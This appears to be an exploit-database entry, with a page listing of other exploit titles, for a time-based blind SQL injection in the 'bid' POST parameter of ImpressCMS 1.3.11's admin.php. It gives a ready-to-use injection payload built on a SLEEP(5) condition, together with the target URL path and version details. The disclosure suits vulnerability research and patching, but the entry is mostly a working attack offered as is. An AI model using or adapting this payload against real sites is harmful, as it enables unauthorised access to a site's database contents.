6e7548ed0d
10 changes to exploits/shellcodes Microsoft Remote Desktop 10.2.4(134) - Denial of Service (PoC) AddressSanitizer (ASan) - SUID Executable Privilege Escalation (Metasploit) Ghostscript 9.26 - Pseudo-Operator Remote Code Execution Joomla! Component J-CruisePortal 6.0.4 - SQL Injection Joomla! Component JHotelReservation 6.0.7 - SQL Injection SimplePress CMS 1.0.7 - SQL Injection SirsiDynix e-Library 3.5.x - Cross-Site Scripting Splunk Enterprise 7.2.3 - Authenticated Custom App RCE ImpressCMS 1.3.11 - 'bid' SQL Injection Zyxel NBG-418N v2 Modem 1.00(AAXM.6)C0 - Cross-Site Request Forgery
28 lines
No EOL
1,015 B
Text
28 lines
No EOL
1,015 B
Text
# Title: ImpressCMS 1.3.11 - 'bid' SQL Injection
|
|
# Date: 21.01.2019
|
|
# Exploit Author: Mehmet Onder Key
|
|
# Vendor Homepage: http://www.impresscms.org/
|
|
# Software Link:
|
|
https://sourceforge.net/projects/impresscms/files/v1.3.11/impresscms_1.3.11.zip
|
|
# Version: v1.3.11
|
|
# Category: Webapps
|
|
# Tested on: WAMPP @Win
|
|
# Software description:
|
|
ImpressCMS is a community developed Content Management System. With this
|
|
tool maintaining the content of a website becomes as easy as writing a word
|
|
document. ImpressCMS is the ideal tool for a wide range of users: from
|
|
business to community users, from large enterprises to people who want a
|
|
simple, easy to use blogging tool.
|
|
|
|
# Vulnerabilities:
|
|
# An attacker can access all data following an un/authorized user login
|
|
using the parameter.
|
|
|
|
|
|
# POC - SQLi :
|
|
|
|
# Parameter: bid (POST)
|
|
# Request URL: http://localhost/impress/modules/system/admin.php?bid=12
|
|
|
|
# Type : time-based blind
|
|
bid=12') AND SLEEP(5) AND ('Bjhx'='Bjhx&fct=blocksadmin&op=up&rtn=Lw== |